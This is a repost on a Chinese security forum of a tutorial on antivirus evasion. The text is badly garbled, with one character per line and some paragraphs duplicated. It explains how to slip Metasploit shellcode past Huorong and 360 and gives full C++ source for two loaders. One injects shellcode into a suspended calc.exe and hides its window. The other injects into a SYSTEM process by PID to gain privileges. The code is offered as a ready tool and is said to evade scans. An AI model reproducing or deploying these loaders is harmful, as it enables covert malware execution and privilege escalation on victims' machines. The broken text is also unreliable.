论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
免杀
[26767] 2021-08-27_shellcode免杀(2)—C++二次内入免杀火绒360并提权
文档创建者:
s7ckTeam
浏览次数:
1
最后更新:
2025-01-19
免杀
1 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2021-08-27_shellcode免杀(2)—C++二次内入免杀火绒360并提权
1
2
s
h
e
l
l
c
o
d
e
免
杀
(
2
)
—
C
+
+
二
次
内
入
免
杀
火
绒
3
6
0
并
提
权
原
创
小
苏
m
o
o
n
s
e
c
2
0
2
1
-
0
8
-
2
7
收
录
于
话
题
#
渗
透
测
试
免
杀
红
队
,
2
3
个
s
h
e
l
l
c
o
d
e
免
杀
(
免
杀
(
2
)
)
—
C
+
+
二
次
内
入
免
杀
火
绒
二
次
内
入
免
杀
火
绒
3
6
0
并
提
权
(
小
苏
免
杀
)
并
提
权
(
小
苏
免
杀
)
简
介
简
介
小
苏
的
文
章
零
基
础
学
习
渗
透
过
程
完
整
渗
透
流
程
原
理
讲
解
与
M
S
F
免
杀
3
6
0
s
h
e
l
l
c
o
d
e
免
杀
(
1
)
C
语
言
三
条
指
令
免
杀
3
6
0
上
篇
C
语
言
过
3
6
0
很
多
人
可
能
会
想
这
到
底
咋
过
的
,
其
实
就
像
我
们
经
常
喝
水
找
杯
子
倒
水
一
样
的
性
质
,
杀
软
会
考
虑
误
报
选
择
不
杀
,
但
是
火
绒
就
是
六
亲
不
认
了
。
。
免
杀
正
题
免
杀
正
题
进
入
正
题
,
这
次
直
接
先
看
C
+
+
免
杀
效
果
先
准
备
好
m
s
f
监
听
生
成
免
杀
进
行
火
绒
,
3
6
0
检
测
双
过
关
加
载
m
s
f
上
线
C
S
的
c
o
d
e
很
遗
憾
没
过
,
可
以
用
加
密
混
淆
进
行
c
s
免
杀
但
是
这
里
我
就
不
去
搞
了
,
源
码
会
放
到
最
后
,
我
们
主
要
看
思
路
,
一
般
我
们
会
从
这
三
个
方
向
下
手
。
1
.
特
征
码
,
C
S
算
是
被
记
烂
了
,
想
要
从
特
征
码
过
关
那
只
有
给
他
变
个
模
样
,
也
就
是
加
密
混
淆
。
(
有
兴
趣
的
可
以
百
度
特
征
码
)
;
2
.
行
为
检
测
,
字
面
意
思
看
你
做
了
什
么
,
例
如
收
集
信
息
查
看
版
本
什
么
的
,
很
多
人
也
都
会
去
做
,
所
以
就
作
为
正
常
行
为
,
但
是
你
要
用
o
f
f
i
c
e
进
程
去
执
行
下
载
执
行
的
命
令
,
可
能
不
会
杀
,
但
是
告
警
就
弹
出
来
了
,
之
后
就
是
被
做
掉
了
。
3
.
内
存
指
令
,
其
实
就
是
特
征
码
行
为
方
面
,
就
像
女
人
化
了
妆
看
起
来
很
漂
亮
,
隆
胸
垫
鼻
梁
,
改
造
外
观
,
但
是
再
怎
么
改
造
内
心
思
想
还
是
原
来
的
(
比
喻
,
并
非
歧
视
女
性
)
,
目
前
看
的
话
火
绒
对
c
s
的
内
存
指
令
应
该
还
是
有
些
保
护
不
周
。
进
入
正
题
分
析
这
里
注
意
d
e
f
i
n
e
抛
错
直
接
复
制
就
好
创
建
变
量
:
B
O
O
L
i
n
j
e
c
t
i
o
n
(
)
,
创
建
s
h
e
l
l
c
o
d
e
注
射
;
先
看
T
C
H
A
R
这
个
作
用
就
是
区
分
常
规
的
A
N
S
I
编
码
(
使
用
"
"
包
裹
)
和
U
n
i
c
o
d
e
编
码
(
使
用
L
"
"
包
裹
)
;
S
T
A
R
T
U
P
I
N
F
O
s
i
;
窗
口
特
性
创
建
P
R
O
C
E
S
S
_
I
N
F
O
R
M
A
T
I
O
N
:
创
建
新
进
程
句
柄
L
P
V
O
I
D
无
类
型
的
指
针
,
创
建
两
个
变
量
;
H
A
N
D
L
E
:
窗
口
句
柄
,
简
单
点
理
解
就
是
创
建
的
程
序
是
窗
口
程
序
D
W
O
R
D
四
字
节
变
量
,
也
就
是
这
个
d
w
E
x
i
t
C
o
d
e
不
管
怎
么
样
就
是
一
个
四
字
节
变
量
;
B
O
O
L
初
始
化
变
量
为
F
A
L
S
E
实
际
表
示
的
是
0
;
运
行
过
程
:
给
l
p
M
a
l
w
a
r
e
B
a
s
e
A
d
d
r
赋
值
为
s
h
e
l
l
c
o
d
e
;
G
e
t
S
y
s
t
e
m
D
i
r
e
c
t
o
r
y
(
C
a
p
p
n
a
m
e
,
M
A
X
_
P
A
T
H
)
;
_
t
c
s
c
a
t
(
C
a
p
p
n
a
m
e
,
L
"
c
a
l
c
.
e
x
e
"
)
;
p
r
i
n
t
f
(
"
I
n
j
e
c
t
i
o
n
p
r
o
g
r
a
m
N
a
m
e
:
%
S
r
n
"
,
C
a
p
p
n
a
m
e
)
;
获
取
计
算
器
地
址
为
了
启
动
它
;
Z
e
r
o
M
e
m
o
r
y
清
零
数
据
;
创
建
计
算
器
,
C
r
e
a
t
e
P
r
o
c
e
s
s
创
建
新
进
程
,
调
用
已
经
获
取
的
计
算
器
目
录
地
址
,
最
后
的
参
数
为
停
止
暂
停
,
引
用
s
i
和
p
i
也
就
是
窗
口
。
最
后
的
r
e
t
u
r
n
就
是
如
果
失
败
就
返
回
0
结
束
;
开
辟
空
间
,
获
得
进
程
句
柄
地
址
,
n
u
l
l
表
示
自
动
分
配
内
存
地
址
,
分
配
大
小
为
h
e
l
l
c
o
d
e
,
后
边
为
申
请
权
限
可
读
可
运
行
。
将
s
h
e
l
l
c
o
d
e
写
入
进
程
,
返
回
的
句
柄
(
句
柄
可
以
理
解
为
是
一
种
指
向
指
针
的
指
针
,
也
就
是
存
指
针
的
指
针
)
,
再
就
是
要
写
的
内
存
首
地
址
,
也
就
是
进
程
内
存
空
间
,
之
后
将
我
们
赋
值
的
指
针
数
据
写
入
,
也
就
是
s
h
e
l
l
c
o
d
e
。
创
建
线
程
,
线
程
所
属
的
进
程
句
柄
也
就
是
我
们
运
行
的
程
序
,
0
的
意
思
为
立
即
执
行
,
起
始
地
址
为
a
d
d
r
e
t
;
等
待
进
程
结
束
l
p
n
e
w
V
i
c
t
i
m
B
a
s
e
A
d
d
r
=
V
i
r
t
u
a
l
A
l
l
o
c
E
x
(
p
i
.
h
P
r
o
c
e
s
s
,
N
U
L
L
,
s
i
z
e
o
f
(
s
h
e
l
l
c
o
d
e
)
+
1
,
M
E
M
_
C
O
M
M
I
T
|
M
E
M
_
R
E
S
E
R
V
E
,
P
A
G
E
_
E
X
E
C
U
T
E
_
R
E
A
D
W
R
I
T
E
)
;
W
r
i
t
e
P
r
o
c
e
s
s
M
e
m
o
r
y
(
p
i
.
h
P
r
o
c
e
s
s
,
l
p
n
e
w
V
i
c
t
i
m
B
a
s
e
A
d
d
r
,
(
L
P
V
O
I
D
)
l
p
M
a
l
w
a
r
e
B
a
s
e
A
d
d
r
,
s
i
z
e
o
f
(
s
h
e
l
l
c
o
d
e
)
+
1
,
N
U
L
L
)
;
h
T
h
r
e
a
d
=
C
r
e
a
t
e
R
e
m
o
t
e
T
h
r
e
a
d
(
p
i
.
h
P
r
o
c
e
s
s
,
0
,
0
,
(
L
P
T
H
R
E
A
D
_
S
T
A
R
T
_
R
O
U
T
I
N
E
)
l
p
n
e
w
V
i
c
t
i
m
B
a
s
e
A
d
d
r
,
N
U
L
L
,
0
,
N
U
L
L
)
;
W
a
i
t
F
o
r
S
i
n
g
l
e
O
b
j
e
c
t
(
p
i
.
h
T
h
r
e
a
d
,
I
N
F
I
N
I
T
E
)
;
G
e
t
E
x
i
t
C
o
d
e
P
r
o
c
e
s
s
(
p
i
.
h
P
r
o
c
e
s
s
,
&
d
w
E
x
i
t
C
o
d
e
)
;
T
e
r
m
i
n
a
t
e
P
r
o
c
e
s
s
(
p
i
.
h
P
r
o
c
e
s
s
,
0
)
;
r
e
t
u
r
n
b
R
3
4
启
动
进
程
注
入
将
代
码
注
入
进
计
算
机
进
程
里
。
总
结
:
总
结
:
首
先
创
建
窗
口
,
设
置
窗
口
特
性
,
赋
值
s
h
e
l
l
c
o
d
e
给
第
一
个
指
针
,
利
用
正
常
的
启
动
计
算
器
行
为
打
掩
护
,
并
将
句
柄
里
的
数
据
清
空
,
开
辟
内
存
进
程
空
间
留
出
s
h
e
l
l
c
o
d
e
大
小
的
进
程
空
间
,
将
第
一
个
写
入
s
h
e
l
l
c
o
d
e
的
指
针
写
入
第
二
个
开
辟
的
进
程
空
间
,
(
重
点
:
我
们
将
重
点
:
我
们
将
s
h
e
l
l
c
o
d
e
现
存
如
第
一
现
存
如
第
一
个
指
针
但
是
不
用
那
么
就
不
会
杀
,
之
后
我
们
做
的
行
为
都
是
正
常
行
为
进
行
混
淆
,
接
着
进
行
空
间
开
辟
并
保
护
起
来
个
指
针
但
是
不
用
那
么
就
不
会
杀
,
之
后
我
们
做
的
行
为
都
是
正
常
行
为
进
行
混
淆
,
接
着
进
行
空
间
开
辟
并
保
护
起
来
)
,
之
后
就
是
将
s
h
e
l
l
c
o
d
e
注
入
进
这
个
计
算
机
进
程
里
。
到
这
里
算
是
完
成
s
h
e
l
l
c
o
d
e
注
入
了
,
怎
么
说
呢
,
这
是
九
年
前
的
思
路
,
只
是
用
了
现
在
更
替
换
代
的
代
码
形
式
表
达
出
来
,
C
S
确
实
强
大
所
以
主
流
杀
软
基
本
都
把
它
记
烂
了
,
我
也
在
努
力
自
己
写
自
己
的
专
属
马
。
注
入
提
权
注
入
提
权
可
以
配
合
注
入
进
行
提
权
操
作
如
下
我
们
先
利
用
开
始
的
免
杀
进
行
注
入
获
取
s
h
e
l
l
,
之
后
在
上
传
一
个
指
定
注
入
p
i
d
的
免
杀
注
入
开
始
我
们
是
管
理
员
权
限
,
之
后
我
们
利
用
p
i
d
加
这
个
进
程
的
权
限
进
行
注
入
提
权
我
用
了
m
s
f
的
提
权
会
弹
告
警
阻
止
后
就
变
成
了
这
里
我
们
就
查
看
系
统
运
行
的
进
程
p
i
d
加
上
此
进
程
权
限
进
行
注
入
提
权
,
先
看
源
码
,
我
们
直
接
在
p
i
d
这
里
输
入
带
有
系
统
权
限
的
p
i
d
进
行
生
成
生
成
后
查
杀
也
是
全
过
之
后
在
开
启
一
个
m
s
f
监
听
利
用
上
一
个
免
杀
的
m
s
f
进
行
运
行
查
看
权
限
,
得
到
系
统
权
限
,
友
情
提
示
,
有
些
系
统
进
程
是
无
效
的
,
看
准
了
再
射
友
情
提
示
,
有
些
系
统
进
程
是
无
效
的
,
看
准
了
再
射
免
杀
姿
势
还
是
蛮
多
的
,
但
是
像
C
S
s
h
e
l
l
c
o
d
e
这
样
被
记
烂
了
就
有
点
烦
了
。
最
后
把
源
码
给
各
位
,
工
具
找
月
师
傅
获
取
。
#
d
e
f
i
n
e
_
C
R
T
_
S
E
C
U
R
E
_
N
O
_
W
A
R
N
I
N
G
S
#
i
n
c
l
u
d
e
<
W
i
n
d
o
w
s
.
h
>
#
i
n
c
l
u
d
e
<
s
t
d
i
o
.
h
>
#
i
n
c
l
u
d
e
<
t
c
h
a
r
.
h
>
#
i
n
c
l
u
d
e
"
i
o
s
t
r
e
a
m
"
u
s
i
n
g
n
a
m
e
s
p
a
c
e
s
t
d
;
u
n
s
i
g
n
e
d
c
h
a
r
s
h
e
l
l
c
o
d
e
[
]
=
"
"
;
/
/
输
入
你
可
爱
的
M
S
F
s
h
e
l
l
c
o
d
e
B
O
O
L
i
n
j
e
c
t
i
o
n
(
)
{
T
C
H
A
R
C
a
p
p
n
a
m
e
[
M
A
X
_
P
A
T
H
]
=
{
0
}
;
S
T
A
R
T
U
P
I
N
F
O
s
i
;
P
R
O
C
E
S
S
_
I
N
F
O
R
M
A
T
I
O
N
p
i
;
L
P
V
O
I
D
l
p
M
a
l
w
a
r
e
B
a
s
e
A
d
d
r
;
L
P
V
O
I
D
l
p
n
e
w
V
i
c
t
i
m
B
a
s
e
A
d
d
r
;
H
A
N
D
L
E
h
T
h
r
e
a
d
;
D
W
O
R
D
d
w
E
x
i
t
C
o
d
e
;
B
O
O
L
b
R
e
t
=
F
A
L
S
E
;
l
p
M
a
l
w
a
r
e
B
a
s
e
A
d
d
r
=
s
h
e
l
l
c
o
d
e
;
G
e
t
S
y
s
t
e
m
D
i
r
e
c
t
o
r
y
(
C
a
p
p
n
a
m
e
,
M
A
X
_
P
A
T
H
)
;
_
t
c
s
c
a
t
(
C
a
p
p
n
a
m
e
,
L
"
c
a
l
c
.
e
x
e
"
)
;
p
r
i
n
t
f
(
"
I
n
j
e
c
t
i
o
n
p
r
o
g
r
a
m
N
a
m
e
:
%
S
r
n
"
,
C
a
p
p
n
a
m
e
)
;
Z
e
r
o
M
e
m
o
r
y
(
&
s
i
,
s
i
z
e
o
f
(
s
i
)
)
;
s
i
.
c
b
=
s
i
z
e
o
f
(
s
i
)
;
Z
e
r
o
M
e
m
o
r
y
(
&
p
i
,
s
i
z
e
o
f
(
p
i
)
)
;
i
f
(
C
r
e
a
t
e
P
r
o
c
e
s
s
(
C
a
p
p
n
a
m
e
,
N
U
L
L
,
N
U
L
L
,
N
U
L
L
,
F
A
L
S
E
,
C
R
E
A
T
E
_
S
U
S
P
E
N
D
E
D
,
N
U
L
L
,
N
U
L
L
,
&
s
i
,
&
p
i
)
=
=
0
)
{
r
e
t
u
r
n
b
R
e
t
;
}
l
p
n
e
w
V
i
c
t
i
m
B
a
s
e
A
d
d
r
=
V
i
r
t
u
a
l
A
l
l
o
c
E
x
(
p
i
.
h
P
r
o
c
e
s
s
,
N
U
L
L
,
s
i
z
e
o
f
(
s
h
e
l
l
c
o
d
e
)
+
1
,
M
E
M
_
C
O
M
M
I
T
|
M
E
M
_
R
E
S
E
R
V
E
,
P
A
G
E
_
E
X
E
C
U
T
E
_
R
E
A
D
W
R
I
T
E
)
;
i
f
(
l
p
n
e
w
V
i
c
t
i
m
B
a
s
e
A
d
d
r
=
=
N
U
L
L
)
{
r
e
t
u
r
n
b
R
e
t
;
}
W
r
i
t
e
P
r
o
c
e
s
s
M
e
m
o
r
y
(
p
i
.
h
P
r
o
c
e
s
s
,
l
p
n
e
w
V
i
c
t
i
m
B
a
s
e
A
d
d
r
,
(
L
P
V
O
I
D
)
l
p
M
a
l
w
a
r
e
B
a
s
e
A
d
d
r
,
s
i
z
e
o
f
(
s
h
e
l
l
c
o
d
e
)
+
1
,
N
U
L
L
)
;
h
T
h
r
e
a
d
=
C
r
e
a
t
e
R
e
m
o
t
e
T
h
r
e
a
d
(
p
i
.
h
P
r
o
c
e
s
s
,
0
,
0
,
5
第
二
个
线
程
注
入
关
注
关
注
关
注
本
公
众
号
关
注
本
公
众
号
不
定
期
更
新
文
章
和
视
频
不
定
期
更
新
文
章
和
视
频
欢
迎
前
来
关
注
欢
迎
前
来
关
注
h
T
h
r
e
a
d
=
C
r
e
a
t
e
R
e
m
o
t
e
T
h
r
e
a
d
(
p
i
.
h
P
r
o
c
e
s
s
,
0
,
0
,
(
L
P
T
H
R
E
A
D
_
S
T
A
R
T
_
R
O
U
T
I
N
E
)
l
p
n
e
w
V
i
c
t
i
m
B
a
s
e
A
d
d
r
,
N
U
L
L
,
0
,
N
U
L
L
)
;
W
a
i
t
F
o
r
S
i
n
g
l
e
O
b
j
e
c
t
(
p
i
.
h
T
h
r
e
a
d
,
I
N
F
I
N
I
T
E
)
;
G
e
t
E
x
i
t
C
o
d
e
P
r
o
c
e
s
s
(
p
i
.
h
P
r
o
c
e
s
s
,
&
d
w
E
x
i
t
C
o
d
e
)
;
T
e
r
m
i
n
a
t
e
P
r
o
c
e
s
s
(
p
i
.
h
P
r
o
c
e
s
s
,
0
)
;
r
e
t
u
r
n
b
R
e
t
;
}
v
o
i
d
h
e
l
p
(
c
h
a
r
*
p
r
o
c
)
{
p
r
i
n
t
f
(
"
%
s
:
[
-
]
n
s
t
a
r
t
a
p
r
o
c
e
s
s
a
n
d
i
n
j
e
c
t
i
o
n
s
h
e
l
l
c
o
d
e
t
o
m
e
m
o
r
y
r
n
"
,
p
r
o
c
)
;
}
i
n
t
m
a
i
n
(
i
n
t
a
r
g
c
,
c
h
a
r
*
a
r
g
v
[
]
)
{
H
W
N
D
h
w
n
d
D
O
S
=
G
e
t
F
o
r
e
g
r
o
u
n
d
W
i
n
d
o
w
(
)
;
/
/
得
到
前
台
窗
口
的
句
柄
S
h
o
w
W
i
n
d
o
w
(
h
w
n
d
D
O
S
,
S
W
_
H
I
D
E
)
;
/
/
隐
藏
窗
口
h
e
l
p
(
a
r
g
v
[
0
]
)
;
i
n
j
e
c
t
i
o
n
(
)
;
r
e
t
u
r
n
0
;
}
#
d
e
f
i
n
e
_
C
R
T
_
S
E
C
U
R
E
_
N
O
_
W
A
R
N
I
N
G
S
#
i
n
c
l
u
d
e
<
w
i
n
d
o
w
s
.
h
>
#
i
n
c
l
u
d
e
<
s
t
d
l
i
b
.
h
>
#
i
n
c
l
u
d
e
<
s
t
d
i
o
.
h
>
u
n
s
i
g
n
e
d
c
h
a
r
S
h
e
l
l
C
o
d
e
[
]
=
"
"
;
i
n
t
m
a
i
n
(
)
{
H
A
N
D
L
E
H
a
n
d
l
e
;
H
A
N
D
L
E
r
e
m
o
t
e
T
h
r
e
a
d
;
P
V
O
I
D
r
e
m
o
t
e
B
u
f
f
e
r
;
D
W
O
R
D
P
i
d
;
P
i
d
=
;
H
a
n
d
l
e
=
O
p
e
n
P
r
o
c
e
s
s
(
P
R
O
C
E
S
S
_
A
L
L
_
A
C
C
E
S
S
,
F
A
L
S
E
,
P
i
d
)
;
r
e
m
o
t
e
B
u
f
f
e
r
=
V
i
r
t
u
a
l
A
l
l
o
c
E
x
(
H
a
n
d
l
e
,
N
U
L
L
,
s
i
z
e
o
f
(
S
h
e
l
l
C
o
d
e
)
,
(
M
E
M
_
R
E
S
E
R
V
E
|
M
E
M
_
C
O
M
M
I
T
)
,
P
A
G
E
_
E
X
E
C
U
T
E
_
R
E
A
D
W
R
I
T
E
)
;
W
r
i
t
e
P
r
o
c
e
s
s
M
e
m
o
r
y
(
H
a
n
d
l
e
,
r
e
m
o
t
e
B
u
f
f
e
r
,
S
h
e
l
l
C
o
d
e
,
s
i
z
e
o
f
(
S
h
e
l
l
C
o
d
e
)
,
N
U
L
L
)
;
r
e
m
o
t
e
T
h
r
e
a
d
=
C
r
e
a
t
e
R
e
m
o
t
e
T
h
r
e
a
d
(
H
a
n
d
l
e
,
N
U
L
L
,
0
,
(
L
P
T
H
R
E
A
D
_
S
T
A
R
T
_
R
O
U
T
I
N
E
)
r
e
m
o
t
e
B
u
f
f
e
r
,
N
U
L
L
,
0
,
N
U
L
L
)
;
C
l
o
s
e
H
a
n
d
l
e
(
H
a
n
d
l
e
)
;
r
e
t
u
r
n
0
;
}
暗
月
的
个
人
微
信
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
免杀